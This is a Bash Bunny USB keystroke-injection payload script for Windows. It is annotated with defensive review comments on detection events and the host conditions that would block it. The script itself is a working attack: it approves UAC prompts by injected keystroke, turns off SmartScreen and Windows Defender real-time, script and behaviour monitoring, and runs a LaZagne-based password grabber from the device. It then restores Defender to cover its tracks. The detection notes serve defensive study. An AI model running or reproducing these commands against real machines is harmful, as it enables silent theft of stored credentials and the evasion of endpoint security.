#!/bin/bash
|
|
#
|
|
# Title: Disable Windows Defender and Exfil stored passwords
|
|
# Description: Grabs passwords from all sorts of things: chrome, internet explorer, firefox, filezilla and more...
|
|
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny has started to quack.
|
|
# This payload makes use of AlessandroZ's awesome LaZagne password recovery tool as well as the Password Grabber by jdebetaz.
|
|
# Author: rafa-guillermo
|
|
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade, jdebetaz
|
|
# Version: 1.2
|
|
# Category: Credentials
|
|
# Target: Windows
|
|
# Tested On: Windows 11
|
|
# Attackmodes: HID, STORAGE
|
|
#
# Review notes (defensive reading of this file):
# Everything below is a keystroke script: the Bunny enumerates as a keyboard
# plus a mass-storage volume, opens an elevated PowerShell, types commands,
# and finally restores the settings it changed. As written it depends on
# three host conditions that are all under the target's control:
#   - a USB port that accepts an unknown keyboard + storage device
#     (USB device-control / allow-listing stops the payload before stage 1);
#   - a logged-on local administrator with a consent-only UAC prompt, so that
#     a bare ALT+y keystroke approves elevation (a credential prompt or a
#     standard-user session stops it at the prompt);
#   - Defender Tamper Protection being off, so the Set-MpPreference calls in
#     stage 1 are accepted rather than rejected.
# Each stage also leaves host telemetry (new HID/storage device enumeration,
# an elevated powershell.exe, Defender configuration changes, registry value
# writes), which is what a detection rule for this behaviour should key on.
# The PowerShell stage script (payload.ps1) referenced in stage 2 is not part
# of this file.
|
|
# Options
|
|
# Loot directory on the Bunny's own storage (udisk). NOTE(review): created
# below but not referenced again in this file; presumably payload.ps1 writes
# into it — confirm against that script.
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
|
|
|
######## Set-up ########
|
|
LED SETUP
|
|
# Reads the physical switch position; used in stage 2 to build the
# payloads\<switch>\payload.ps1 path on the storage volume.
GET SWITCH_POSITION
|
|
# Present as keyboard (HID) and mass storage at the same time. The
# simultaneous appearance of both device classes from one USB device is the
# earliest observable for this payload.
ATTACKMODE HID STORAGE
|
|
# Volume label the Windows side uses to find the Bunny's drive (stage 2).
# The literal label is a stable string for device-control policies.
DRIVE_LABEL=BashBunny
|
|
|
|
######## Make Loot Dir ########
|
|
# Setup named logs in loot directory
|
|
# NOTE(review): unquoted expansion; harmless for this fixed path but not
# safe if LOOTDIR is ever made configurable.
mkdir -p $LOOTDIR
|
|
|
|
####### Open a powershell window with elevated privileges #######
|
|
LED STAGE1
|
|
# Launches a second PowerShell with -Verb RunAs, i.e. this triggers a UAC
# prompt on the host. The inner \" are bash escapes for the quotes typed
# into the Run dialog.
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
|
sleep 3 # wait for UAC prompt
|
|
# ALT+y presumably answers the UAC consent dialog (see the sleep above). This
# only works for a consent prompt shown to an administrator; a credential
# prompt is not satisfied by this keystroke.
QUACK ALT y
|
|
sleep 2
|
|
|
|
# Disable Windows Defender File Scan and Real Time Protection
|
|
# Three SmartScreen registry values (per-user Explorer, per-machine Explorer,
# per-user Edge) are set to Off. The HKLM write is why elevation was needed
# above. Registry value-set telemetry (e.g. Sysmon event 13) on these keys
# is the matching detection; a policy-enforced SmartScreen setting is
# typically not overridden by these writes.
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value Off -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value Off -Force
|
|
QUACK ENTER
|
|
# Four Defender preferences are turned off. The \$ keeps bash from expanding
# $true so the literal is typed into PowerShell. With Tamper Protection
# enabled these calls are rejected; when they do apply, the real-time
# protection change is recorded in the Defender operational event log
# (e.g. event 5001), which is the primary detection for this stage.
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$true
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$true
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$true
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$true
|
|
QUACK ENTER
|
|
sleep 1
|
|
|
|
# Run laZagne
|
|
LED STAGE2
|
|
# Resolves the Bunny's drive letter by WMI volume label. $DRIVE_LABEL is
# expanded by bash before typing (it is unescaped inside the double quotes),
# while \$bashBunnyDrive is escaped so it reaches PowerShell as a variable.
QUACK STRING "\$bashBunnyDrive = (Get-WmiObject -Query \"SELECT * FROM Win32_Volume WHERE Label='$DRIVE_LABEL'\" | Select-Object -ExpandProperty DriveLetter)"
|
|
QUACK ENTER
|
|
# Builds the path to payload.ps1 on the storage partition; $SWITCH_POSITION
# is expanded by bash here too. payload.ps1 itself is not in this file.
QUACK STRING "\$scriptPath = \"\$bashBunnyDrive\\payloads\\$SWITCH_POSITION\\\payload.ps1\""
|
|
QUACK ENTER
|
|
# Invokes the script from removable media. A script-execution policy or an
# application-control rule that blocks scripts on removable drives stops
# this step; the elevated powershell.exe reading from a freshly mounted
# volume is the observable.
QUACK STRING \& \$scriptPath
|
|
QUACK ENTER
|
|
# Waits a fixed 10 s for payload.ps1 rather than waiting on its completion.
sleep 10
|
|
QUACK STRING exit
|
|
QUACK ENTER
|
|
|
|
|
|
# Re-enable Defender and Smart screen
|
|
LED CLEANUP
|
|
# Second elevation: a new elevated PowerShell (and a second UAC prompt) is
# opened to restore the settings changed in stage 1. Two consent prompts
# within roughly 20 s of a new keyboard appearing is itself a usable
# detection pattern.
RUN WIN "powershell -Command \"Start-Process powershell -Verb RunAs\""
|
|
sleep 3 # wait for UAC prompt
|
|
QUACK ALT y
|
|
sleep 2
|
|
# Same three SmartScreen values as stage 1, set back to On.
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer -Name SmartScreenEnabled -Value On -Force
|
|
QUACK ENTER
|
|
QUACK STRING Set-ItemProperty -Path HKCU:\\Software\\Microsoft\\Edge -Name SmartScreenEnabled -Value On -Force
|
|
QUACK ENTER
|
|
# Same four Defender preferences as stage 1, set back to $false. Note that
# this restore only covers what this file changed; it does not undo anything
# payload.ps1 may have done.
QUACK STRING Set-MpPreference -DisableRealtimeMonitoring \$false
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableIOAVProtection \$false
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableBehaviorMonitoring \$false
|
|
QUACK ENTER
|
|
QUACK STRING Set-MpPreference -DisableScriptScanning \$false
|
|
QUACK ENTER
|
|
sleep 1
|
|
QUACK STRING exit
|
|
QUACK ENTER
|
|
|
|
######## FINISH ########
|
|
LED FINISH
|